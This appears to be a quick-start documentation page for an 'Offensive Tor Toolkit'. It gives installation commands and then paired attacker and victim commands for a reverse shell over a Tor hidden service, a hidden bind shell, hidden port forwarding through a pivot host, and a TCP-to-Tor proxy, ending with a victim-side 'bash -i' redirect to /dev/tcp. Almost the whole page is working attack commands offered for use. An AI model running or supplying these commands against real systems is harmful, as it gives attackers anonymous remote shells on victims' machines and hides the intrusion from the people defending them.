TL;DR

Too Long; Didn't Read

Download Offensive Tor Toolkit

export VERSION=$(
    curl -s "https://api.github.com/repos/atorrescogollo/offensive-tor-toolkit/releases" \
     | jq -r '.[].name | select(. | test("v[0-9]+\\."))' \
     | sort -rV | head -1
)

# Download the release
wget https://github.com/atorrescogollo/offensive-tor-toolkit/releases/download/${VERSION}/offensive-tor-toolkit-${VERSION}.tar.gz

# Uncompress
tar -xvzf offensive-tor-toolkit-${VERSION}.tar.gz

# Move to /opt/offensive-tor-toolkit/
sudo mv offensive-tor-toolkit-${VERSION}* /opt
sudo ln -sf offensive-tor-toolkit-${VERSION} /opt/offensive-tor-toolkit
cd /opt/offensive-tor-toolkit

Reverse Shell over Tor

Attacker

$ grep '^HiddenServicePort' /etc/tor/torrc
HiddenServicePort 4444 127.0.0.1:4444
$ nc -lvnp 4444

Victim

$ ./reverse-shell-over-tor -listener m5et..jyd.onion:4444

Bind Shell over Tor

Victim

$ ./hidden-bind-shell -data-dir /tmp/datadir/ -hiddensrvport 1234
...
Bind shell is listening on hgnzi...g6yew.onion:1234

Attacker

$ alias nctor='nc --proxy 127.0.0.1:9050 --proxy-type socks5'
$ nctor -v hgnzi...g6yew.onion 1234

Hidden Port Forwarding

Victim/Pivot

$ ./hidden-portforwarding -data-dir /tmp/pf-datadir -forward 127.0.0.1:1111 -hidden-port 9001
...
Forwarding xa7l...a4el.onion:9001 -> 127.0.0.1:8080

Attacker

$ alias curltor="curl --socks5-hostname 127.0.0.1:9050"
$ curltor http://xa7l...a4el.onion:9001/

TCP2Tor Proxy

Attacker

$ grep '^HiddenServicePort' /etc/tor/torrc
HiddenServicePort 4444 127.0.0.1:4444
$ nc -lvnp 4444

Pivot

$ ./tcp2tor-proxy -listen 0.0.0.0:60101 -onion-forward m5et..jyd.onion:4444
...
Proxying 0.0.0.0:60101 -> m5et..jyd.onion:4444

Victim

$ bash -i >& /dev/tcp/<PIVOT_IP>/60101 0>&1
PreviousIntroductionNextDownload

Last updated